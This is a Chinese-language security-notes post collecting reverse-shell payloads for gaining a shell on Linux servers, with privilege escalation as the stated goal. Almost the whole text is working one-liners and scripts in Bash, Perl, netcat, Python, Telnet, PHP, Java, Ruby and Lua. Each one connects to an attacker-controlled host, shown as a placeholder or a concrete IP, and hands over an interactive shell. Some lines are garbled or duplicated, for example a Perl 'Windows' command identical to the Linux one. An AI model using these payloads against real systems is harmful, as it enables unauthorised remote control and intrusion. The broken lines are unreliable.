linux反弹shell姿势

安全笔记

遇到linux服务器,马上想到反弹shell到本地进行溢出等提权尝试,这里搜集了一些常用的反弹姿势。

  • 首先,选一个未被目标防火墙过滤的TCP端口
1
attacker$ nc -l -v attackerip 4444
  • Bash
1
/bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
1
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
1
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
1
2
3
1. exec 5<>/dev/tcp/attackerip/4444
2. cat <&5 | while read line; do $line 2>&5 >&5; done  # or:
while read line 0<&5; do $line 2>&5 >&5; done
  • Perl

不依赖于/bin/sh

1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

如果是目标基于windows,还可以

1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

也可上传一个

1
2
3
4
5
6
7
8
9
10
11
12
#1.pl
use Socket;
$i="x.x.x.x";
$p=8080;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i))))
	{
		open(STDIN,">&S");
		open(STDOUT,">&S");
		open(STDERR,">&S");
		exec("/bin/sh -i");
			};

  • Netcat

取决于nc的版本,在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个GAPING_SECURITY_HOLE常量)

1
nc -e /bin/sh attackerip 4444

1
/bin/sh | nc attackerip 4444
1
2
如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p
1
2
1. mknod /tmp/backpipe p
2. /bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
  • python
1
2
3
4
5
6
7
8
9
10
#1.py
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("x.x.x.x",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#2.py
#!/usr/bin/python
import socket,subprocess

HOST = '10.16.44.100' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
# recieve shell command
data = s.recv(1024)
# if its quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
# close socket
s.close()
  • Telnet
1
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

本地在4445端口监听

1
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

  • PHP
1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  • JAVA
1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
  • Ruby

目标基于linux

1
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

目标基于windows

1
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

  • lua
1
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

参考链接:
https://www.waitalone.cn/linux-shell-rebound-under-way.html